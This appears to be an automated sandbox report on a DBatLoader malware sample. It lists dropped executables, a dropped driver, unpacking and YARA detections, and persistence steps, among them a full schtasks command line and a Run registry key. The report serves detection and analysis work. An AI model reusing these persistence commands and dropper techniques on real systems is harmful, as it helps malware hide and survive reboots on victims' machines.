Source:	Binary string: mscorlib.pdb source: rpkhzpuO.pif, 00000015.00000002.2531569622.0000000031ACA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2692149290.000000002D0CB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbIL source: rpkhzpuO.pif, 0000001F.00000002.2692149290.000000002D0CB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, 00000004.00000002.2212967585.0000000020800000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F260000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2209421224.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020819000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: rpkhzpuO.pif, 00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbXa source: rpkhzpuO.pif, 0000001A.00000003.2462367771.000000002B3DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2212967585.0000000020800000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F260000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168492490.00000000217A2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168492490.00000000217D1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2209421224.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020819000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303256685.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303256685.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000003.2401750651.0000000000893000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000003.2401750651.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2494620308.0000000000992000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2494620308.0000000000963000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 8.2.rpkhzpuO.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 21.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 26.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 31.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 8.2.rpkhzpuO.pif.400000.3.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 21.2.rpkhzpuO.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 26.2.rpkhzpuO.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 31.2.rpkhzpuO.pif.400000.0.unpack

Yara detected DBatLoader

Source: Yara match	File source: 4.2.x.exe.22065a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.22065a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.2b20000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2209421224.0000000001420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000001.2174375803.0000000001420000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2176575888.0000000002206000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2259800821.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 8.2.rpkhzpuO.pif.25174e5e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: rpkhzpuO.pif.4.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B38798 LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02B38798

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B4C2FC push 02B4C367h; ret	4_2_02B4C35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B232FC push eax; ret	4_2_02B23338
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2635A push 02B263B7h; ret	4_2_02B263AF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2635C push 02B263B7h; ret	4_2_02B263AF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B4C0AC push 02B4C125h; ret	4_2_02B4C11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B4C1F8 push 02B4C288h; ret	4_2_02B4C280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B4C144 push 02B4C1ECh; ret	4_2_02B4C1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B386B8 push 02B386FAh; ret	4_2_02B386F2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B26736 push 02B2677Ah; ret	4_2_02B26772
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B26738 push 02B2677Ah; ret	4_2_02B26772
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2C4EC push ecx; mov dword ptr [esp], edx	4_2_02B2C4F1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3E5AC push ecx; mov dword ptr [esp], edx	4_2_02B3E5B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2D520 push 02B2D54Ch; ret	4_2_02B2D544
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2CA82 push 02B2CCF2h; ret	4_2_02B2CCEA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B4BB64 push 02B4BD8Ch; ret	4_2_02B4BD84
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2CB6C push 02B2CCF2h; ret	4_2_02B2CCEA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3788C push 02B37909h; ret	4_2_02B37901
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B368C6 push 02B36973h; ret	4_2_02B3696B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B368C8 push 02B36973h; ret	4_2_02B3696B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B38910 push 02B38948h; ret	4_2_02B38940
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3A917 push 02B3A950h; ret	4_2_02B3A948
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3A918 push 02B3A950h; ret	4_2_02B3A948
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3890E push 02B38948h; ret	4_2_02B38940
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B32EE0 push 02B32F56h; ret	4_2_02B32F4E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B32FEB push 02B33039h; ret	4_2_02B33031
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B32FEC push 02B33039h; ret	4_2_02B33031
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B35DFC push ecx; mov dword ptr [esp], edx	4_2_02B35DFE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_0041C40C push cs; iretd	8_2_0041C4E2
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00423149 push eax; ret	8_2_00423179
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_0041C50E push cs; iretd	8_2_0041C4E2
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_004231C8 push eax; ret	8_2_00423179

Source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 8.2.rpkhzpuO.pif.25174e5e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\Oupzhkpr.PIF			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\rpkhzpuO.pif			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	File created: C:\Windows \SysWOW64\truesight.sys
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	File created: C:\Windows \SysWOW64\truesight.sys
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	File created: C:\Windows \SysWOW64\truesight.sys

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\Oupzhkpr.PIF	Jump to dropped file
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	File created: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\rpkhzpuO.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Oupzhkpr			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Oupzhkpr			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B3A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_02B3A954

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
